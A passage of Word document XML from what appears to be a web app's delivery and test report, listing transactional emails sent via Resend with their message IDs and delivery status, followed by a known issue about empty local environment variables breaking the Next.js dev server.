              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="20E38CFE"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Resend Message ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="54A4ABBD"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Recipient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4C5D45BB"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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="228F5B99" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="55247AC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Booking Confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7387957C"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f837eac6-97ec-45c2-8a6d-5bbbce6e925f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="337EAAC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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1D6ABADC"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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="275E07E2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70B9AF9B"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Booking Reminder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E92C1E6"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db89d3ba-d52a-48ad-b22b-4bd7d7d0c9f6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F25604E"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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57EC82A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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="25DCEEF6" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5D61253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Booking Cancellation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="72DCBC90"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2077c6ee-aaf0-4957-bfb5-82ea9cfe7753</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="193AD28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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="00AA71D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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="62DD8AAC" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27C8284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No-Show Follow-up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44BD6FF6"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5859403b-2260-4e67-8ba8-9fefb0087aaa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="327D1BD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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04A2568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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="364E524C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="681DD35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Low Stock Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5B413E77"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886f032f-0fc6-4b52-b198-8f7ab6494680</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="71064C3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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="19A6FD40"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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="456B7BEB" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75B8037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Welcome Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F6A3F4E"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b0c242b1-ebc9-45d7-aa07-3d0d9ff29186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A0B610A"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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41967DF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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="4F25978E" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="477DC4A1"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Staff Invitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3EED41A9"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e185ba44-2731-4441-a4ad-fb6b44343c14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2EFCBCD3"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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="30E4A89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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="751F5F17" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7033FA7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New Signup Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="151CF6A3" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>058ce440-991d-448f-ba11-e734d2d97e81</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132E764D"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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787D2C7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Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F8FE66C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Verify in Resend dashboard </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Emails </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> search by message ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E879AD1" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="19CE53F3">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B3F1C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc228978588"/>
      <w:bookmarkStart w:id="33" w:name="known-issues-recommendations"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Known Issues &amp; Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="48C0E053" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="Xf7fbdf3806b4cd09587ab7a4854524233ecdbe1"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8.1 Local Dev Server — Environment Variables Not Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6AB11C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low (development only, does not affect production)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A195AA8" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file (created by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vercel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CLI) contains empty strings for all variables. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env.ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is imported by the root layout and throws in development mode when </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESEND_API_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is missing, causing the Next.js dev server to fail to render any route.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B7D6EB"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Resolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copy real values </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for local development. The production </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vercel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployment is not affected — env vars are set correctly in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vercel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBCC0D3" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="no-show-follow-up-not-yet-wired"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
